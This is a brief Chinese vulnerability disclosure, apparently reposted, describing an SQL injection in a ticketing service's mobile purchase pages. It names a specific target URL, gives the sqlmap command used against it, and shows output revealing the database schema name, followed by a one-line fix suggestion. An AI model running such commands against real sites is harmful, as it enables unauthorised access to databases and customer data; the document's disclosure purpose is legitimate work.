中演票务通某处SQL注入漏洞
漏洞存在于手机购票、
漏洞地址:http://m.t3.com.cn:80/detail/onlineId/8367430815293495253
sqlmap -u "http://m.t3.com.cn:80/detail/onlineId/8367430815293495253*"
跑起来:
current schema (equivalent to database on Oracle): 'WEBDBA'
表:
其他信息就不去看了、over
修复方案:
敏感内容过滤
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;